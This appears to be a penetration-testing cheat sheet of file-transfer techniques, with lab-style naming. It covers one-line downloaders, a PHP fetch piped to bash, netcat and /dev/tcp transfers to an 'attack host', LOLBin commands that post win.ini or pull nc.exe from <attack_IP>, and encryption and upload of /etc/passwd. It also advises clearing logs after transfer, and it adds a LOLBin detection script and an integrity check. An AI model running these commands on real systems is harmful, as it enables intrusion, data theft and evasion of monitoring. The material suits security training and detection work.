# Advanced File Transfer Techniques

## Programming Language Methods

### Python

```bash
# Python 2 Download
python2.7 -c 'import urllib; urllib.urlretrieve("URL", "output_file")'

# Python 3 Download
python3 -c 'import urllib.request; urllib.request.urlretrieve("URL", "output_file")'

# Python 3 Upload (requires requests)
python3 -c 'import requests; requests.post("http://<IP>:<PORT>/upload", files={"files": open("/path/to/file", "rb")})'
```

### PHP

```bash
# Download with file_get_contents
php -r '$file = file_get_contents("URL"); file_put_contents("output_file", $file);'

# Download with fopen
php -r 'const BUFFER = 1024; $fremote = fopen("URL", "rb"); $flocal = fopen("output_file", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

# Download and Execute
php -r '$lines = @file("URL"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
```

### Ruby and Perl

```bash
# Ruby Download
ruby -e 'require "net/http"; File.write("output_file", Net::HTTP.get(URI.parse("URL")))'

# Perl Download
perl -e 'use LWP::Simple; getstore("URL", "output_file");'
```

### Windows Scripting Methods

#### JavaScript (wget.js)

```javascript
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
```

Execute with: `cscript.exe /nologo wget.js URL output_file`

#### VBScript (wget.vbs)

```vbscript
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with
```

Execute with: `cscript.exe /nologo wget.vbs URL output_file`

## Netcat and Network Transfer Methods

### Basic Netcat Transfer

```bash
# Receiver (Listening Mode)
nc -l -p 8000 > file_name.exe

# Sender
nc -q 0 target_IP 8000 < file_name.exe
```

### Ncat with Enhanced Features

```bash
# Receiver
ncat -l -p 8000 --recv-only > file_name.exe

# Sender
ncat --send-only target_IP 8000 < file_name.exe
```

### Alternative Methods

```bash
# Listen on Attack Host
sudo nc -l -p 443 -q 0 < file_name.exe

# Connect from Compromised Machine
nc attack_IP 443 > file_name.exe

# Using /dev/tcp (No Netcat)
cat < /dev/tcp/attack_IP/443 > file_name.exe
```

## PowerShell Session File Transfer

### WinRM Setup and Transfer

```powershell
# Test Connection
Test-NetConnection -ComputerName target_name -Port 5985

# Create Session
$Session = New-PSSession -ComputerName target_name

# Transfer Files
Copy-Item -Path C:\localfile.txt -ToSession $Session -Destination C:\remote_path\
Copy-Item -Path "C:\remote_path\remote_file.txt" -Destination C:\local_path\ -FromSession $Session
```

## Protected File Transfers

### Windows Encryption

```powershell
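# Invoke-AESEncryption is not a built-in cmdlet; import the script that defines it before running these commands.

# Encrypt String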
Invoke-AESEncryption -Mode Encrypt -Key "p@ssw0rd" -Text "Sensitive Data"

# Decrypt String
Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Text "<Encrypted_String>"

# Encrypt File
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\file.bin

# Decrypt File
Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\file.bin.aes
```

### Linux Encryption

```bash
# Encrypt File
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc

# Decrypt File
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd
```

## HTTP/S File Upload Server

### Nginx Upload Server Setup

```bash
# Create Upload Directory
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory
```

Nginx configuration (`/etc/nginx/sites-available/upload.conf`):

```nginx
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
    }
}
```

```bash
# Enable Configuration
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo systemctl restart nginx.service

# Test Upload
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt
```

## Living off the Land (LOLBins/GTFOBins)

### Windows LOLBins Examples

```powershell
# CertReq Upload
certreq.exe -Post -config http://<attack_IP>:8000/ C:\Windows\win.ini

# Bitsadmin Download
bitsadmin /transfer myJobName /priority foreground http://<attack_IP>:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

# Certutil Download
certutil.exe -verifyctl -split -f http://<attack_IP>:8000/nc.exe

# PowerShell BITS
Import-Module bitstransfer; Start-BitsTransfer -Source "http://<attack_IP>:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
```
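
For the defending side, the four Windows commands above leave recognizable process command lines. The script below is an added example, not part of the original page: it flags those patterns in process-creation records. The `time|host|command line` layout, the function names and the sample lines are assumptions constructed for illustration.

```bash
# Added example (not from the original page). Log layout "time|host|command line"
# and all function names are assumptions; the sample lines are constructed.

# lolbin_rule "COMMAND LINE" -> name of the matching rule, or "none"
lolbin_rule() {
    c=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')   # match case-insensitively
    case $c in
        *certreq*[-/]post*http*://*)       echo certreq_http_post ;;
        *bitsadmin*/transfer*http*://*)    echo bitsadmin_http_transfer ;;
        *certutil*[-/]verifyctl*http*://*) echo certutil_verifyctl_url ;;
        *start-bitstransfer*http*://*)     echo powershell_bits_url ;;
        *)                                 echo none ;;
    esac
}

# scan_log: reads log lines on stdin, prints "host rule" for every hit
scan_log() {
    while IFS='|' read -r _ts host cmd; do
        rule=$(lolbin_rule "$cmd")
        [ "$rule" = none ] || printf '%s %s\n' "$host" "$rule"
    done
}

# Constructed sample: four transfer commands mixed with benign uses of the same tools
sample_log() {
    cat <<'EOF'
2024-05-01T10:00:01Z|WS01|certreq.exe -Post -config http://192.0.2.10:8000/ C:\Windows\win.ini
2024-05-01T10:00:07Z|WS01|certutil.exe -hashfile C:\Temp\setup.msi SHA256
2024-05-01T10:01:12Z|WS02|bitsadmin /transfer myJobName /priority foreground http://192.0.2.10:8000/nc.exe C:\Users\Public\nc.exe
2024-05-01T10:01:30Z|WS02|bitsadmin /list /allusers
2024-05-01T10:02:44Z|WS03|CertUtil.exe -verifyctl -split -f http://192.0.2.10:8000/nc.exe
2024-05-01T10:03:05Z|WS04|powershell.exe Start-BitsTransfer -Source "http://192.0.2.10:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
2024-05-01T10:03:50Z|WS04|certreq.exe -new request.inf request.csr
EOF
}

sample_log | scan_log
```

These patterns only see the command-line text, so match on the binary's original file name as well where the log source records it.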

### Linux GTFOBins Examples

```bash
# OpenSSL Transfer
# On Attack Host
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

# On Target
openssl s_client -connect <attack_IP>:80 -quiet > LinEnum.sh
```

## Best Practices

1. **Security Considerations**
   * Always encrypt sensitive data before transfer
   * Use secure protocols when available (HTTPS, SFTP, SSH)
   * Clean up files and logs after transfer
2. **Protocol Selection**
   * Consider firewall restrictions
   * Use commonly allowed protocols (HTTP/HTTPS)
   * Have multiple methods ready as backup
3. **Authentication and Access**
   * Use strong, unique passwords for encrypted transfers
   * Remove temporary access after transfer completion
   * Monitor for security alerts during transfer
4. **Testing and Verification**
   * Verify file integrity after transfer
   * Test transfer methods in a lab environment first
   * Document successful methods for future reference
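
The raw `nc` and `/dev/tcp` transfers above do no end-to-end integrity check of their own, so a stream cut short still produces a file. The script below is an added example, not part of the original page, showing one way to do the "verify file integrity after transfer" step; the function names and the one-line manifest layout (`<sha256> <bytes> <name>`) are assumptions.

```bash
# Added example (not from the original page): hash manifest on the sending side,
# verification on the receiving side. Names and manifest layout are assumptions.

sha256_of() {   # portable SHA-256: sha256sum where present, otherwise shasum
    if command -v sha256sum >/dev/null 2>&1; then sha256sum < "$1" | cut -d' ' -f1
    else shasum -a 256 < "$1" | cut -d' ' -f1; fi
}

# Sender: write MANIFEST describing FILE; pass the manifest over a separate channel.
make_manifest() {   # make_manifest FILE MANIFEST
    [ -f "$1" ] || { echo "no such file: $1" >&2; return 2; }
    printf '%s %s %s\n' "$(sha256_of "$1")" "$(wc -c < "$1" | tr -d ' ')" \
        "$(basename "$1")" > "$2"
}

# Receiver: 0 = intact, 1 = size differs (truncated or padded stream),
#           2 = file or manifest missing, 3 = same size but content differs.
verify_transfer() {   # verify_transfer MANIFEST RECEIVED_FILE
    [ -f "$1" ] && [ -f "$2" ] || return 2
    read -r want_hash want_size _name < "$1" || return 2
    [ "$(wc -c < "$2" | tr -d ' ')" = "$want_size" ] || return 1
    [ "$(sha256_of "$2")" = "$want_hash" ] || return 3
    return 0
}

# Constructed demo: an intact copy, a copy cut short mid-stream,
# a same-size corrupted copy, and a file that never arrived.
demo() {
    d=$(mktemp -d) || return 2
    printf 'constructed sample payload 0123456789\n' > "$d/src.bin"
    make_manifest "$d/src.bin" "$d/src.manifest"
    cp "$d/src.bin" "$d/ok.bin"
    head -c 10 "$d/src.bin" > "$d/short.bin"
    tr '0' 'O' < "$d/src.bin" > "$d/flipped.bin"
    out=""
    for f in ok.bin short.bin flipped.bin missing.bin; do
        rc=0
        verify_transfer "$d/src.manifest" "$d/$f" || rc=$?
        out="$out$f=$rc "
    done
    rm -rf "$d"
    printf '%s\n' "${out% }"
}

demo
```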

